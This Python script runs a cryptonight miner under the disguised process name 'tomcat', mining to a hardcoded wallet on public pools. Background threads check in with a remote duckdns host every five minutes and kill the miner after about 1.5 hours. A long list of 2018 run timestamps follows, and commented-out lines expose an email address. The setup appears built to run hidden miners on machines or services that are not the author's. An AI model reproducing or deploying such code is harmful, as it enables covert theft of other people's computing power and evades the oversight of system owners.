import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:48:03.472171
#2018-02-17 17:37:05.100439
#2018-02-17 19:25:05.837404
#2018-02-17 21:14:06.779720
#2018-02-17 22:58:01.948802
#2018-02-18 00:44:02.072656
#2018-02-18 02:33:03.230394
#2018-02-18 04:20:03.878248
#2018-02-18 06:11:01.977416
#2018-02-18 08:00:01.639546
#2018-02-18 09:47:06.703713
#2018-02-18 11:34:06.182876
#2018-02-18 13:19:07.357641
#2018-02-18 15:09:02.086334
#2018-02-18 16:57:06.635012
#2018-02-18 18:44:05.191159
#2018-02-18 20:32:06.070879
#2018-02-18 22:18:06.906052
#2018-02-19 00:07:05.027812
#2018-02-19 01:53:07.145253
#2018-02-19 03:40:07.088939
#2018-02-19 05:25:01.526647
#2018-02-19 07:12:05.343351
#2018-02-19 09:01:04.404495
#2018-02-19 10:49:05.732166
#2018-02-19 12:37:08.595539
#2018-02-19 14:24:08.005277
#2018-02-19 16:13:01.652040
#2018-02-19 17:59:09.289516
#2018-02-19 19:46:01.215007
#2018-02-19 21:33:02.114252
#2018-02-19 23:19:02.127049
#2018-02-20 01:05:04.375528
#2018-02-20 02:54:01.971001
#2018-02-20 04:42:06.020328
#2018-02-20 06:26:02.242103
#2018-02-20 08:11:01.476402
#2018-02-20 09:56:07.258995
#2018-02-20 11:39:01.939268
#2018-02-20 13:25:08.321936
#2018-02-20 15:11:01.564508
#2018-02-20 16:56:09.318607
#2018-02-20 18:46:01.846745
#2018-02-20 20:40:07.053442
#2018-02-20 22:26:01.796438
#2018-02-21 00:07:04.144600
#2018-02-21 01:52:02.112711
#2018-02-21 03:38:06.649913
#2018-02-21 05:27:06.599491
#2018-02-21 07:14:04.906733
#2018-02-21 08:59:06.998618
#2018-02-21 10:47:08.528359
#2018-02-21 12:33:01.493034
#2018-02-21 14:19:08.211858
#2018-02-21 16:09:12.095359
#2018-02-21 17:59:06.826481
#2018-02-21 19:47:09.577870
#2018-02-21 21:33:06.987149
#2018-02-21 23:18:05.299874
#2018-02-22 01:08:05.475163
#2018-02-22 02:55:05.783446
#2018-02-22 04:42:04.913339
#2018-02-22 06:26:05.747183
#2018-02-22 08:13:07.901064
#2018-02-22 10:02:01.686076
#2018-02-22 11:47:08.644917
#2018-02-22 13:32:05.895952
#2018-02-22 15:21:07.226839
#2018-02-22 17:06:06.718502
#2018-02-22 18:52:06.718341
#2018-02-22 20:45:08.885634
#2018-02-22 22:32:07.823863
#2018-02-23 00:17:05.230067
#2018-02-23 02:06:04.593600
#2018-02-23 03:54:08.382055
#2018-02-23 05:37:06.263108
#2018-02-23 07:22:07.280202
#2018-02-23 09:26:04.083938
#2018-02-23 11:31:06.397281
#2018-02-23 13:20:06.368652
#2018-02-23 15:06:01.470210
#2018-02-23 16:54:09.221913
#2018-02-23 18:42:07.592269
#2018-02-23 20:31:04.933605
#2018-02-23 22:18:07.096580
#2018-02-24 00:04:07.595395
#2018-02-24 01:56:01.387903
#2018-02-24 03:47:05.698847
#2018-02-24 05:36:02.046858
#2018-02-24 07:22:04.931212
#2018-02-24 09:12:06.386224
#2018-02-24 11:08:07.406474
#2018-02-24 12:56:03.835408
#2018-02-24 14:43:07.673494
#2018-02-24 16:36:05.853511
#2018-02-24 18:25:04.551911
#2018-02-24 20:11:04.374550
#2018-02-24 21:55:07.768409
#2018-02-25 00:56:01.597072
#2018-02-25 04:47:02.181599
#2018-02-25 09:08:01.941964